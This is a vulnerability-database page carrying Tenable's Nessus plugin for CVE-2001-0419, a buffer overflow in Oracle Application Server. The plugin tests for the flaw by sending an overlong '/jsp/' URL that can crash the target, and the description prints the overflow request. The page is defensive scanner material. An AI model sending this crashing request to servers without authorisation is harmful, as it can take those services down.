Lucene search
K

Oracle Application Server ndwfn4.so HTTP Request Remote Overflow

🗓️ 16 Apr 2001 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 52 Views

Potential remote overflow in Oracle Application Server may allow execution of arbitrary code.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2001-0419
24 May 200104:00
cve
Cvelist
CVE-2001-0419
24 May 200104:00
cvelist
NVD
CVE-2001-0419
2 Jul 200104:00
nvd
Tenable Nessus
Oracle Application Server Multiple Vulnerabilities
24 Jan 201200:00
nessus
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10654);
 script_version("1.27");
 script_cvs_date("Date: 2018/07/16 14:09:13");

 script_cve_id("CVE-2001-0419");
 script_bugtraq_id(2569);

 script_name(english:"Oracle Application Server ndwfn4.so HTTP Request Remote Overflow");
 script_summary(english:"Web server buffer overflow");

 script_set_attribute(attribute:"synopsis", value:"Arbitrary code may be run on the remote server.");
 script_set_attribute(attribute:"description", value:
"It may be possible to make a web server execute arbitrary code by
sending it a too long url starting with /jsp/ For example: GET
/jsp/AAAA.....AAAAA");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for the latest software release.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/04/10");
 script_set_attribute(attribute:"plugin_publication_date", value:"2001/04/16");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:application_server");
 script_end_attributes();

 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"Databases");

 script_dependencie("http_version.nasl", "www_too_long_url.nasl");
 script_exclude_keys("www/too_long_url_crash");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www",80);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(http_is_dead(port:port))exit(0);

r = http_send_recv3(port: port, method: 'GET', item: strcat("/jsp/", crap(2500)));
if (http_is_dead(port: port, retry: 3))
  security_hole(port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jul 2018 14:09Current
5.9Medium risk
Vulners AI Score5.9
CVSS 27.5
EPSS0.18346
52